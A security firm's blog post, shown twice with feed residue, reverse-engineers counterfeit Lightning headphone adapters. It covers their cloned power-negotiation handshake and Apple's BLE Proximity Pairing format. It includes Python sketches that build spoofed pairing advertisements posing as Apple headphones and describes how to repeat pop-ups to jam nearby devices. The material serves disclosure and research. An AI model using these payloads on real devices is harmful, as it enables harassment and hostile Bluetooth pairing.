Baets by Der


Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega. 

 

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.
  

And here’s the short-take of our analysis: Beware the transposed vowels. “Baets” is not what it would want you to believe it is. 

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device called “Baets.” We also noticed the phone’s battery draining much faster than usual.
 

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.


MFi is MIA

The first thing we noted is that none of these adapters has the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables. Apple licenses that chip to control who is allowed to produce Lightning devices. Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. The module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio.

 

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs cost $2 less than the genuine Apple version.

 

This initial finding fueled two research objectives: 1) to discover how the adapter convinced the Apple device to power the module; and 2) to discover how the adapter displayed the pop-up window.

How does it receive power?

We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip. 

 

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.

 


First working counterfeit: Lightning to headphone jack

Second working counterfeit: Lightning to headphone jack

Third counterfeit: Lightning to headphone jack (non-functional)
 
Legitimate Apple adapter. Credit: iFixit


On the active adapters, one side of the PCB holds the Bluetooth chip and antenna. On the other side is a crystal oscillator clock, which connects to the Bluetooth chip. The chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The final chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module. 

 

Lightning Connector pinout according to patent filing:
https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html 

 

In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device.)

 

The female Lightning port control chip is codenamed Hydra (this is a newer version that replaced the chip codenamed Tristar), and has the label CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are only available to MFi-certified manufacturers, and, to prevent counterfeiting, only Apple knows their internal behavior. We will focus on the HiFive chip, since we found replica versions in our Baets adapters.

 

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol, where Apple’s specific implementation is referred to as IDBUS. Our research utilized the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiations include identifying information from the accessory and the Apple device. Still, every individual accessory contains unique information that makes it difficult to reverse engineer and counterfeit without being detected.

 

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.


In 2016, electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic Lightning cables.

 

Decapped third-party chip
http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html 

 

Authentic TI BQ2025 chip decapped
Credit:
9to5mac.com


Many chips advertise the ability to negotiate power through the Lightning port. Knockoff manufacturers continue to create many variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24..” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing other variations of uncertified power negotiating chips include the CY262, AD139, and ASB260, to name a few. It’s unknown if any of these chips or adapters come from the same manufacturers.

 

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

 

Removing the constant high signal from the data line does not affect the negotiation but is necessary for keeping power to the device when the screen is off. Setting the data line consistently high at 1.9V turns on the screen. Some of our adapters do not support sending over the data line in both orientations, so the Bluetooth module turns off when the Apple device stops supplying power when it turns its screen off.


Communication is half-duplex bidirectional, using the SDQ protocol. Like the 1-Wire protocol, the host and adapter communicate over the ACC_ID line only. The female Lightning port repeatedly sends requests for connected accessories to identify themselves. It alternates the pins of the request to determine the accessory orientation.

 

After receiving the request, the chip must first identify itself with the Hydra chip. In this proprietary protocol, if the first byte is even, it is a request, and the request ID + 1 is the response code. The initial request for identification has ID 0x74 and the response is Request ID + 1 (0x75). Not all the types of requests are known, but a list of known commands has been created by @spbdimka.

 

Incomplete List of IDBUS Request Types
https://twitter.com/spbdimka/status/1118597972760125440 
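
As a toy illustration of the request/response convention (our own sketch, not a published spec), labeling bytes seen on the ACC_ID line is straightforward:

KNOWN_REQUESTS = {0x74: "identify"}  # labels beyond 0x74 are not public

def classify(first_byte: int) -> str:
    if first_byte % 2 == 0:
        name = KNOWN_REQUESTS.get(first_byte, "unknown request")
        return f"0x{first_byte:02X}: {name}, expect response 0x{first_byte + 1:02X}"
    return f"0x{first_byte:02X}: response to request 0x{first_byte - 1:02X}"

print(classify(0x74))  # 0x74: identify, expect response 0x75
print(classify(0x75))  # 0x75: response to request 0x74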

 

We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka, but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

After the 0x76 request receives a response, the ACC_PWR line goes high at either 3.3V or 4.1V. If the output is 4.1V, it will eventually correct down to 3.3V. 

This powers on the Bluetooth module, which results in the pop-up window appearing on the device, prompting the user to connect. The ID of the adapter that is responding is 0x11F000000000. While it matches the same pattern as other accessories and cables, it does not match authentic Lightning to headphone jack adapters, which have ID 0x04F100000000. The Baets adapters likely avoid the legitimate identifier because genuine adapters directly convert audio signals and need more functionality than the knock-off versions, which only need to draw 3.3V from the accessory power line.

The Module and Accessory Serial Numbers are sent in plain ASCII format, but it is unknown if they correspond to the same accessory. The messages include additional information for an unknown purpose.

The last two commands are the Apple Device’s Model Number and Software Version in ASCII with the following format:

Changing the device and the iOS version we used to test resulted in different values for the Model Number and Software Version, as would be expected.

How does it activate the pop-up window?

Other research, including Handoff All Your Privacy and Discontinued Privacy, has highlighted Apple’s use of Bluetooth Low Energy (BLE) to enable Continuity features such as AirDrop, AirPrint, and Handoff. It is also used for Proximity Pairing with AirPods and other Bluetooth headphones made by Apple. We found that it was possible to duplicate the behavior to show the prompt on any nearby Apple devices. Pressing ‘Connect’ will pair with a Bluetooth device of our choosing while it’s posing as any model of Apple wireless headphones.

Pop-Up Window to connect AirPods


When Bluetooth is on, Apple devices send and receive BLE messages in the background. New research from the Technical University of Darmstadt in Germany highlights that these BLE advertisements continue when iPhones are turned off. These messages are receivable by any nearby BLE devices, even if they are intended for communication with paired devices. iPhones and iPads are the most active, constantly advertising their status, including whether they are locked, unlocked, driving, playing music, watching a video, and making or receiving a call. Bluetooth headphones (e.g., AirPods, Beats) also advertise their status and battery level. Apple Watches use BLE to communicate their connectivity to a paired iPhone.

There is a lot of other data that Apple devices are freely advertising over the air using BLE. The BLE advertising packets are well documented and used by many popular devices and phones similar to the Apple Continuity protocols. Apple’s format is known from prior research:

Structure of a BLE advertisement packet 

Celosia, G., & Cunche, M. (2020)

The Manufacturer Specific Data includes the length of the data, the Apple company identifier (0x004C), and then the Continuity Message that is different for each respective Continuity protocol. We focused on the Continuity Message for the Proximity Pairing feature for this research. It has been previously documented as having only this format:


Proximity Pairing (AirPods)

Celosia, G., & Cunche, M. (2020)

 

However, when another device receives this advertisement from very close range, it recognizes that it is near someone else’s AirPods and alerts the user.


We found that an additional format is implemented for headphones ready to pair with a new device. The different setting is denoted by setting the third byte to 0x00. This format is shown below with an example of data we observed from the adapters:


Advertising data from Baets Adapter:
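
The captured advertisement bytes were shown as an image. As a hedged reconstruction, here is roughly how such a payload could be assembled in Python. The 0x004C company ID and the "third byte 0x00 means ready to pair" behavior come from the observations above; the Proximity Pairing message type 0x07 comes from prior Continuity research; the remaining field order and widths are our assumptions for illustration:

import struct

APPLE_COMPANY_ID = 0x004C  # Apple's Bluetooth SIG company identifier
PROXIMITY_PAIRING = 0x07   # Continuity message type (per prior research)
MODEL_BEATSX = 0x0520      # device model the adapters use to pose as BeatsX

def pairing_message(model: int, bt_addr: bytes, tag: bytes) -> bytes:
    # [type][length][0x00 = pairing mode][device model][BT Classic address][tag]
    payload = bytes([0x00]) + struct.pack(">H", model) + bt_addr + tag
    return bytes([PROXIMITY_PAIRING, len(payload)]) + payload

def manufacturer_data(message: bytes) -> bytes:
    # BLE AD structure: [length][0xFF = Manufacturer Specific Data][company ID][message]
    body = struct.pack("<H", APPLE_COMPANY_ID) + message
    return bytes([len(body) + 1, 0xFF]) + body

adv = manufacturer_data(pairing_message(MODEL_BEATSX, bytes(6), b"\x01"))
print(adv.hex())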


The Bluetooth Address specifies the address of any device to pair with using Bluetooth Classic. This does not have to be the adapter itself. Once paired, the adapter will stop broadcasting over BLE and maintain the Bluetooth Classic connection. The device model specifies which image and name appear on the connect screen. All the adapters we investigated used the device model 0x0520 to appear as BeatsX earphones. Other possible device models were checked using scripts modified from Hexway’s Apple BLEEE project, resulting in the following, likely incomplete list:

We only tested these ranges of codes, so there are likely other possible values. Any unknown device model results in a screen prompting the device to check for a software update. There is an option to check for updates or setup. 




“Set up with limited functionality.” pop-up with an unknown device model, where “RingRing” is a cell phone (not headphones)

Changing the unknown field affects whether the dialog pops up at all, pops up and disappears immediately, or stays on the screen as normal. In addition, some values will not result in a pop-up window appearing, depending on the device model advertised. The real purpose of this field is unknown and requires further testing.


Typically, if the pop-up window is closed, then another will not appear until the user turns their screen off and on again. However, if the unique tag field is changed randomly, the pop-up will occur about every 5 seconds after the user closes the previous window. This effectively prevents nearby users from using their devices because they must constantly close these windows. Other purposes for this field may exist but are not known at this time.

The Bluetooth modules found in the adapters implement the Proximity Pairing format for advertising through BLE. These modules are meant to replicate Apple’s W1 or H1 Bluetooth chip used in Apple’s own Bluetooth headphones. The manufacturers of these counterfeit chips advertise the functionality for use in cheap Bluetooth headphones to make the pairing process more seamless. These chips can also use the Proximity Pairing packet format to advise the iPhone of the headphones’ battery level.

 

Promotional presentation/document for YC1168 Bluetooth chip
with pop-up window functionality.

Source: https://zhuanlan.zhihu.com/p/111406089 

 

As a result, these chips are becoming widely used in fake AirPods or Beats headphones, making it more difficult to identify counterfeits. In order to verify legitimate headphones, the user must either check the serial number directly with Apple or recognize the differences in quality, which may be difficult without prior experience. Our bodega Baets adapters came in boxes that looked nearly identical to the Apple version, but without the Apple logo.

Summary of Risks

The use of chips that negotiate drawing power from the device presents a number of risks. Allowing unlicensed devices to connect directly to the hardware threatens Apple’s business model, but more importantly the consumer, as it may cause damage to the Apple device. There is no protection circuitry in the adapter to protect the Apple device if the adapter somehow sends too much voltage or current back through the Lightning port. We have observed quick battery drain, but these adapters may also damage the Apple device, which has been shown to happen when using unlicensed charging cables.

 

The ability to make a window pop-up on the device to connect to an unknown device is also a risk. Some Bluetooth devices, like the AirPods Pro, have the capability of using Siri and can then read and send messages, make and receive calls, read contacts, and have other functions that present a security risk. You would not want to let an arbitrary Bluetooth device belonging to someone else access your text messages.

 

Dialogue shown after connecting Bluetooth device disguised as AirPods Pro

 

The only way to turn off Proximity Pairing and prevent these dialogs is to turn off Bluetooth entirely. Once the dialog appears, the only way to close it is to press the small ‘X’ button. Clicking around the dialog does not get rid of the pop-up window. During testing, if the Apple device tries connecting to the Bluetooth address of headphones that are connected to another device, it will disconnect them. This makes it possible to create a string of events that would make an attack more likely to succeed. 

 

So, if you see an endless stream of random pairing requests on your Apple device, now you know your sole option:

Turn off Bluetooth and keep it off. 


– By Jared Gonzales and Joel Cretan

Want to learn how the hardware around you works? Come work with us! 


Shoutout to RBS alum Trey Keown for the title of this blog post.

To learn more about Red Balloon Security‘s offers, visit our Products page or contact us: [email protected]

Friendly advice from Red Balloon Security: Just pay the extra $2

Recently, we wanted to use some wired headphones with an iPhone, which sadly lacks a headphone jack. The nearest deli offered a solution: a Lightning-to-headphone jack adapter for only $7. Got to love your local New York City bodega. 

 

But a wrinkle appeared: Plugging in the adapter made the phone pop up a dialog to pair with a BeatsX device, which changed to “Baets” once a Bluetooth connection was established. Shouldn’t this thing be a simple digital-to-analog converter? Why is Bluetooth involved? What makes the iPhone think it’s from Beats? That’s too many questions to ignore: We had to dig into this unexpected embedded device.

  

And here’s the short-take of our analysis: Beware the transposed vowels. “Baets” is not what it would want you to believe it is. 

Once connected, the headphones work as if directly plugged into the phone. But we found that Bluetooth must remain on to keep listening, and the phone insists it is connected to a Bluetooth device, called “Baets.” We also noticed the phone’s battery draining much faster than usual.
 

This mysterious behavior piqued our interest. Red Balloon specializes in embedded security and reverse engineering, so interest gave way to action. We promptly bought a dozen more of the same adapter model to tear down and study.

Table of Contents

MFi is MIA

The first thing we noted is none of these adapters has the Apple Made for iPhone/iPad (MFi) chip you’ll find in genuine, approved accessories and cables; Apple licenses that chip to control who is allowed to produce Lightning devices.

 

Instead, each of these knock-off adapters draws power from the Apple device to power its own Bluetooth module. This module then broadcasts that it is ready to pair with the Apple device, though in fact any nearby device can now pair with it and play audio. 

Presumably, using Bluetooth is cheaper than licensing Apple’s chip, which is why the knockoffs costs $2 less than the genuine Apple version.

 

This initial finding fueled two research objectives:  To discover how the adapter convinced the Apple device to power the module; and to discover how the adapter displayed the pop-up window.

How does it receive power?

We encountered three different hardware configurations on these devices; they appear to have many similarities, but it’s unclear if the same manufacturer makes them. One of the variations does not work: It doesn’t appear to power up, generates no pop-ups, and has no Bluetooth Classic connection. But this variation successfully draws power from the Apple device, so the failure is likely in the circuit or Bluetooth chip. 

 

Overall, the hardware is not very complex and lacks components seen in a genuine adapter, including protection circuitry.

 


First working counterfeit: Lightning to headphone jack



Second working counterfeit: Lightning to headphone jack



Third counterfeit: Lightning to  headphone jack (non-functional, not working)


 
Legitimate Apple adapter. Credit: iFixit


One side of the PCB is the Bluetooth chip and antenna on the active adapters. On the other side is a crystal oscillator clock, which connects to the Bluetooth chip. The chip connects to the accessory power (ACC_PWR) pin of the Lightning connector but does not automatically receive power. The final chip negotiates with the Apple device to draw power through the Lightning port. This negotiation chip is vital to enabling power for the Bluetooth module. 

 

Lightning Connector pinout according to patent filing:
https://web.archive.org/web/20190801205452/http://ramtin-amin.fr/tristar.html 

 

In Lightning connectors, the pins on each side of the connector do not mirror each other, so the control chip must identify the orientation of the connector before proceeding. In addition, the Lightning connector has a dynamic pinout controlled by the Lightning port control chip in the Apple device, which negotiates with a security chip in the cable. (Nyan Satan’s research into the Lightning port provides a good baseline for understanding the communication between any accessory and the Apple device).

 

The female Lightning port control chip is codenamed Hydra (this is a newer version that replaced the chip codenamed Tristar), and has the label CBTL1614A1 on the iPhone 12, according to a teardown by iFixit, which identifies it as a multiplexer. Apple guards details on these chips, but some data sheets have leaked in the past, revealing some expected functions. HiFive is the codename of the security chip in the cable, labeled as SN2025 or BQ2025 in male connectors. These chips are only available to MFi-certified manufacturers, but Apple only knows the internal behavior to prevent counterfeits. We will focus on the HiFive chip since we found replica versions in our Baets adapters.

 

The HiFive chip identifies the cable and negotiates for power through the Texas Instruments SDQ protocol; Apple’s specific implementation is referred to as IDBUS. Our research used the SDQAnalyzer plugin for the Saleae Logic Analyzer. The negotiation includes identifying information from both the accessory and the Apple device, and every individual accessory contains unique information, which makes it difficult to reverse engineer and counterfeit without being detected.

 

Replicating the communication of a single, legitimate Apple accessory is enough to draw power. This means that every knockoff chip from the same model identifies itself as the same individual accessory or cable to the Apple device (with the same serial number or unique data as the single cloned cable’s HiFive chip). As a result, an iOS update can block this handshake and break all the devices using the same knockoff chip that shares a single serial number. This may explain why some cheap charging cables and accessories mysteriously stop working or produce error/unlicensed warnings when plugged in. The owner of the legitimate cloned cable may also be out of luck, but the impact would be limited to that individual.


In 2016, electronupdate decapped an earlier version of these third-party chips and revealed a much simpler die than you’ll find in the legitimate TI BQ2025 chip used in authentic Lightning cables.

 

Decapped third-party chip
http://electronupdate.blogspot.com/2016/09/3rd-party-apple-lightning.html 

 

Authentic TI BQ2025 chip decapped
Credit:
9to5mac.com


Many chips advertise the ability to negotiate power through the Lightning port, and knockoff manufacturers continue to create new variations as old versions stop working. One of our Baets devices uses an unknown chip labeled “24.” The others use the MT821B and 821B, which all share the same accessory serial number. Online posts referencing variations of uncertified power-negotiating chips include the CY262, AD139, and ASB260, to name a few. It’s unknown whether any of these chips or adapters come from the same manufacturers.

 

Each chip receives the 2.65V signal from the ACC_ID line and outputs 1.9V to one of the data lines.

 

The constant high signal on the data line does not affect the negotiation, but it is necessary for keeping power flowing to the adapter when the screen is off; setting the data line consistently high at 1.9V also turns on the screen. Some of our adapters cannot drive the data line in both connector orientations, so when the Apple device turns its screen off and stops supplying power, the Bluetooth module turns off.


Communication is half-duplex and bidirectional, using the SDQ protocol. As with the 1-Wire protocol, the host and adapter communicate over a single line, here ACC_ID. The female Lightning port repeatedly sends requests for connected accessories to identify themselves, alternating the pins of the request to determine the accessory’s orientation.

After receiving the request, the chip must first identify itself to the Hydra chip. In this proprietary protocol, an even first byte denotes a request, and the corresponding response code is the request ID + 1. The initial request for identification has ID 0x74, so its response code is 0x75. Not all of the request types are known, but a list of known commands has been created by @spbdimka.
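The even/odd pairing rule is simple enough to capture in a few lines. The helper below is a hypothetical sketch of ours for labeling captured IDBUS command bytes, not part of any official tooling:

				
					# Hypothetical helper: label a captured IDBUS command byte using the rule
# described above (even = request, response code = request ID + 1).
def idbus_kind(code: int) -> str:
    return "request" if code % 2 == 0 else "response"

def idbus_response_code(request_id: int) -> int:
    assert request_id % 2 == 0, "only requests have responses"
    return request_id + 1

assert idbus_kind(0x74) == "request"
assert idbus_response_code(0x74) == 0x75  # Get ID -> Parse Get ID
				
			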

 

Incomplete List of IDBUS Request Types
https://twitter.com/spbdimka/status/1118597972760125440 

 

We observed many of these codes during our investigation. Others are not listed explicitly by @spbdimka but can be inferred since each response is just an incremented code of the request. The encoding of the data is unknown, but we can get a general idea of the process necessary to request power from the device. The adapter responds to these requests with incremented response codes, as expected. The negotiation from that adapter is shown below:

Request/Response Type  | Request/Response Code | Data                                                         | CRC8
Get ID                 | 74                    | 00 02                                                        | 1F
Parse Get ID           | 75                    | 11 F0 00 00 00 00                                            | D6
Get Module State       | 72                    |                                                              | 71
Parse Module State     | 73                    | 80 00 C0 00                                                  | 87
Get Module State       | 70                    | 80 00                                                        | 12
Parse Module State     | 71                    |                                                              | 93
Get Interface Info     | 76                    |                                                              | 10
Get Interface Info     | 76                    |                                                              | 10
Parse Interface Info   | 77                    | 01 25 01 80 A0 6A 8D 25 26 66                                | 2E
Get Module Serial      | 78                    |                                                              | 0F
Parse Module Serial    | 79                    | 44 57 48 32 33 38 37 34 57 32 44 46 35 4C 34 41 39 00 BB 88 | 0E
Get Accessory Serial   | 7A                    |                                                              | B3
Parse Accessory Serial | 7B                    | 43 30 38 32 34 32 36 30 4B 37 4C 44 59 37 51 41 51 00 30 00 | CC
Extract System Info    | 84                    | 00 00 05 4D 51 44 54 32                                      | FD
Extract System Info    | 84                    | 01 00 06 31 39 45 32 35 38                                   | 49

After the 0x76 request receives a response, the ACC_PWR line goes high at either 3.3V or 4.1V. If it starts at 4.1V, it eventually settles down to 3.3V.

This powers on the Bluetooth module, which causes the pop-up window to appear on the device, prompting the user to connect. The responding adapter’s ID is 0x11F000000000. While it matches the pattern of other accessories and cables, it does not match authentic Lightning to headphone jack adapters, which have ID 0x04F100000000. The Baets adapters likely avoid the legitimate identifier because legitimate adapters directly convert audio signals and need more functionality than the knock-off versions, which only need to draw 3.3V from the accessory power line.

The Module and Accessory Serial Numbers are sent in plain ASCII format, but it is unknown if they correspond to the same accessory. The messages include additional information for an unknown purpose.

 

Command | Value                                               | ASCII Representation | Unknown  | CRC8
79      | 44 57 48 32 33 38 37 34 57 32 44 46 35 4C 34 41 39 | DWH23874W2DF5L4A9    | 00 BB 88 | 0E
7B      | 43 30 38 32 34 32 36 30 4B 37 4C 44 59 37 51 41 51 | C0824260K7LDY7QAQ    | 00 30 00 | CC

 

The last two commands are the Apple Device’s Model Number and Software Version in ASCII with the following format:

 

Command | Model/Software Version | Unknown | Value             | ASCII Representation | CRC8
84      | 00 (Model Number)      | 00 05   | 4D 51 44 54 32    | MQDT2 (iPad)         | FD
84      | 01 (Software Version)  | 00 06   | 31 39 45 32 35 38 | 19E258 (iOS 15.4.1)  | 49
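These ASCII fields decode directly; a quick sketch, with the hex bytes taken from the capture above:

				
					# Decode the ASCII payloads from the table above (bytes from our capture).
model = bytes.fromhex("4D 51 44 54 32").decode("ascii")     # "MQDT2"  -> iPad
build = bytes.fromhex("31 39 45 32 35 38").decode("ascii")  # "19E258" -> iOS 15.4.1
print(model, build)
				
			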

 

Changing the device and the iOS version we used to test resulted in different values for the Model Number and Software Version, as would be expected.

How does it activate the pop-up window?

Other research, including Handoff All Your Privacy and Discontinued Privacy, has highlighted Apple’s use of Bluetooth Low Energy (BLE) to enable Continuity features such as AirDrop, AirPrint, and Handoff. BLE is also used for Proximity Pairing with AirPods and other Bluetooth headphones made by Apple. We found that it was possible to duplicate this behavior to show the prompt on any nearby Apple device. Pressing ‘Connect’ will then pair with a Bluetooth device of our choosing while it poses as any model of Apple wireless headphones.

 

Pop-Up Window to connect AirPods


When Bluetooth is on, Apple devices send and receive BLE messages in the background. New research from the Technical University of Darmstadt in Germany highlights that these BLE advertisements continue even when iPhones are turned off. These messages are receivable by any nearby BLE device, even when they are intended for communication with paired devices. iPhones and iPads are the most active, constantly advertising their status, including whether they are locked, unlocked, driving, playing music, watching a video, or making or receiving a call. Bluetooth headphones (e.g., AirPods, Beats) also advertise their status and battery level. Apple Watches use BLE to communicate connectivity to a paired iPhone.

 

Apple devices freely advertise a lot of other data over the air using BLE. BLE advertising packets are well documented and are used by many popular devices and phones in ways similar to Apple’s Continuity protocols. Apple’s format is known from prior research:

 

Structure of a BLE advertisement packet 

Celosia, G., & Cunche, M. (2020)

 

The Manufacturer Specific Data includes the length of the data, the Apple company identifier (0x004C), and then the Continuity Message that is different for each respective Continuity protocol. We focused on the Continuity Message for the Proximity Pairing feature for this research. It has been previously documented as having only this format:


Proximity Pairing (AirPods)

Celosia, G., & Cunche, M. (2020)

 

However, when another device receives this advertisement from very close range, it recognizes that it is near someone else’s AirPods and alerts the user.

 


We found that an additional format is implemented for headphones that are ready to pair with a new device. This mode is denoted by setting the third byte to 0x00. The format is shown below, with an example of data we observed from the adapters:

 

Field                    | Size
0x07 (Proximity Pairing) | 1 Byte
Length                   | 1 Byte
0x00 (Pairing Mode)      | 1 Byte
Device Model             | 2 Bytes
Bluetooth Address        | 6 Bytes
Unknown                  | 1 Byte
Right Battery            | 1 Byte
Left Battery             | 1 Byte
Case Battery             | 1 Byte
Unique Tag               | 1 Byte
Color                    | 1 Byte


Advertising data from Baets Adapter:

 

Value          | Meaning
0x07           | Proximity Pairing
0x0F           | Length
0x00           | Pairing Mode
0x0520         | Device Model (BeatsX)
0x414209D43151 | Bluetooth Address (41:42:09:D4:31:51)
0x95           | Unknown
0x64           | Right Battery (100%)
0x64           | Left Battery (100%)
0x64           | Case Battery (100%)
0x02           | Unique Tag
0x00           | Color (White)
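To make the layout concrete, below is a minimal Python sketch of ours (hypothetical, not from any Apple or adapter SDK) that assembles the exact Manufacturer Specific Data shown above; the field order and sizes follow the two tables, and the constants come from our capture. Transmitting the result as a BLE advertisement is platform-specific and out of scope here.

				
					import struct

APPLE_COMPANY_ID = 0x004C  # Apple's Bluetooth company ID (little-endian on air)
PROXIMITY_PAIRING = 0x07   # Continuity message type
PAIRING_MODE = 0x00        # third byte 0x00 = ready to pair with a new device

def proximity_pairing_payload(device_model, bt_addr, right=100, left=100,
                              case=100, unique_tag=0x02, color=0x00,
                              unknown=0x95):
    """Build the Continuity message: type, length, then the fields above."""
    addr = bytes(int(octet, 16) for octet in bt_addr.split(":"))
    body = struct.pack(">BH", PAIRING_MODE, device_model) + addr
    body += bytes([unknown, right, left, case, unique_tag, color])
    return bytes([PROXIMITY_PAIRING, len(body)]) + body

# Manufacturer Specific Data for the BeatsX example captured above
msd = struct.pack("<H", APPLE_COMPANY_ID) + proximity_pairing_payload(
    0x0520, "41:42:09:D4:31:51")
print(msd.hex())  # 4c00070f000520414209d4315195646464640200
				
			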


The Bluetooth Address specifies the address of any device to pair with over Bluetooth Classic; it does not have to be the adapter itself. Once paired, the adapter stops broadcasting over BLE and maintains the Bluetooth Classic connection. The device model specifies which image and name appear on the connect screen. All the adapters we investigated used device model 0x0520 to appear as BeatsX earphones. We checked other possible device models using scripts modified from Hexway’s Apple BLEEE project, resulting in the following, likely incomplete, list:

 

Hex Value | Device Model
0220      | Airpods
0320      | PowerBeats3
0520      | BeatsX
0620      | Beats Solo3
0920      | Beats Studio3
0A20      | Airpods Max
0B20      | Powerbeats Pro
0C20      | Beats Solo Pro
0D20      | Powerbeats
0E20      | Airpods Pro
0F20      | Airpods
1020      | Beats Flex
1120      | Beats Studio Buds

We only tested these ranges of codes, so there are likely other valid values. Any unknown device model results in a screen prompting the device to check for a software update, with options to check for updates or to proceed with setup (a sketch of such a sweep follows the screenshot below).

 



“Set up with limited functionality.” pop-up shown with an unknown device model, where “RingRing” is a cell phone (not headphones)
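A sweep over candidate model values could look like the following sketch, reusing the hypothetical proximity_pairing_payload() helper from earlier; our actual testing used scripts modified from Hexway’s Apple BLEEE project, and the transmit step is platform-specific, so it is left abstract here:

				
					import struct

# Hypothetical sweep over Device Model values in the tested range; the
# advertise() call stands in for a platform-specific BLE transmit step.
for model in range(0x0220, 0x1220, 0x0100):
    msd = struct.pack("<H", APPLE_COMPANY_ID) + proximity_pairing_payload(
        model, "41:42:09:D4:31:51")
    # advertise(msd)  # hypothetical transmit; watch a target device for a pop-up
				
			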

 

Changing the unknown field affects whether the dialog pops up at all, pops up and disappears immediately, or stays on the screen as normal. In addition, some values will not produce a pop-up window at all, depending on the device model advertised. The real purpose of this field is unknown and requires further testing.


Typically, once the pop-up window is closed, another will not appear until the user turns their screen off and on again. However, if the unique tag field is changed randomly, a new pop-up appears about every 5 seconds after the user closes the previous one. This effectively prevents nearby users from using their devices, because they must constantly close these windows. This field may serve other purposes that are not known at this time.

The Bluetooth modules found in the adapters implement the Proximity Pairing format for advertising over BLE. These modules are meant to replicate Apple’s W1 or H1 Bluetooth chips used in Apple’s own Bluetooth headphones. The manufacturers of these counterfeit chips advertise this functionality for use in cheap Bluetooth headphones, to make the pairing process more seamless. These chips can also use the Proximity Pairing packet format to report the headphones’ battery level to the iPhone.

Promotional presentation/document for YC1168 Bluetooth chip
with pop-up window functionality.

Source: https://zhuanlan.zhihu.com/p/111406089 

 

As a result, these chips are becoming widely used in fake AirPods or Beats headphones, making it more difficult to identify counterfeits. In order to verify legitimate headphones, the user must either check the serial number directly with Apple or recognize the differences in quality, which may be difficult without prior experience. Our bodega Baets adapters came in boxes that looked nearly identical to the Apple version, but without the Apple logo.

Summary of Risks

The use of chips that negotiate drawing power from the device presents a number of risks. Allowing unlicensed devices to connect directly to the hardware threatens Apple’s business model but, even more importantly, the consumer, as it may damage the Apple device. The adapter contains no protection circuitry to protect the Apple device if the adapter somehow sends too much voltage or current back through the Lightning port. We observed rapid battery drain, and these adapters may also damage the Apple device, as has been shown to happen with unlicensed charging cables.

 

The ability to make a window pop up on the device prompting a connection to an unknown device is also a risk. Some Bluetooth devices, like the AirPods Pro, can use Siri and can then read and send messages, make and receive calls, read contacts, and perform other functions that present a security risk. You would not want to let an arbitrary Bluetooth device belonging to someone else access your text messages.

 

Dialogue shown after connecting Bluetooth device disguised as AirPods Pro

 

The only way to turn off Proximity Pairing and prevent these dialogs is to turn off Bluetooth entirely. Once the dialog appears, the only way to close it is to press the small ‘X’ button; clicking around the dialog does not dismiss it. During testing, we found that if the Apple device tries to connect to the Bluetooth address of headphones that are already connected to another device, it disconnects them. This makes it possible to chain together a string of events that makes an attack more likely to succeed.

 

So, if you see an endless stream of random pairing requests on your Apple device, now you know your sole option:

 

Turn off Bluetooth and keep it off. 


– By Jared Gonzales and Joel Cretan

Want to learn how the hardware around you works? Come work with us! 


Shoutout to RBS alum Trey Keown for the title of this blog post.

To learn more about Red Balloon Security’s offerings, visit our Products page or contact us: [email protected]

]]>
https://redballoonsecurity.com/baets/feed/ 0 7712
Red Balloon Security Wins 2022 NSF Convergence Accelerator Award for Proposed Improvements to 5G Cybersecurity Through Hardening of Embedded Devices https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/ https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/#respond Thu, 08 Sep 2022 04:17:12 +0000 https://redballoonsecurity.com/red-balloon-security-wins-2022-nsf/

